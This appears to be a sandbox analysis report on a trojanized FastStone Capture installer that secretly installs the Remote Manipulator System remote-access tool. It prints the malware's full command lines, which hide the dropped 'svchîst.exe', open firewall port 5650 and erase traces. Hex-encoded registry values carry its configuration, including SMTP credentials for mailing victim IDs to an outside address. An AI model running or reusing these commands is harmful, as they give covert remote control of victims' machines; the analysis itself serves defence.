N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2756 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 4120 wrote to memory of 3088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4120 wrote to memory of 3088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4120 wrote to memory of 3088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2756 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 2756 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 2756 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 4916 wrote to memory of 4220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4916 wrote to memory of 4220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4916 wrote to memory of 4220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4916 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4916 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4916 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4120 wrote to memory of 4672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4120 wrote to memory of 4672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4120 wrote to memory of 4672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4120 wrote to memory of 5040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4120 wrote to memory of 5040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4120 wrote to memory of 5040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4120 wrote to memory of 4344 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4120 wrote to memory of 4344 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4120 wrote to memory of 4344 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2292 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2292 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2292 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2292 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\route.exe
PID 2292 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\route.exe
PID 2292 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\route.exe
PID 4120 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4120 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4120 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2756 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 4120 wrote to memory of 832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 4120 wrote to memory of 832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 4120 wrote to memory of 832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 5092 wrote to memory of 3588 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\FastStone Capture\FSCapture.exe
PID 5092 wrote to memory of 3588 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\FastStone Capture\FSCapture.exe
PID 5092 wrote to memory of 3588 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\FastStone Capture\FSCapture.exe
PID 1240 wrote to memory of 3924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1240 wrote to memory of 3924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1240 wrote to memory of 3924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2756 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 832 wrote to memory of 4472 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe

"C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svchîst.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f& REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f& Exit

C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe

"C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe" /S /IR

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SYSTEM\Remote Manipulator System" /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening TCP 5650 "Open Port 5650"

C:\Windows\SysWOW64\netsh.exe

netsh.exe advfirewall firewall delete rule name="all" remoteip=95.141.193.133

C:\Windows\SysWOW64\route.exe

route.exe delete 95.141.193.133

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\FastStone Capture\FSCapture.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Program Files\FastStone Capture\FSCapture.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\*.*"

C:\Windows\SysWOW64\drivers\install.exe

"C:\Windows\System32\drivers\install.exe"

C:\Program Files (x86)\FastStone Capture\FSCapture.exe

"C:\Program Files (x86)\FastStone Capture\FSCapture.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\*.*"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c RMDIR /s/q "C:\Users\Admin\AppData\Local\Temp\FastStone Capture"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FastStone Capture 9.4" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 19.0.9700.2132" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\cmd.exe

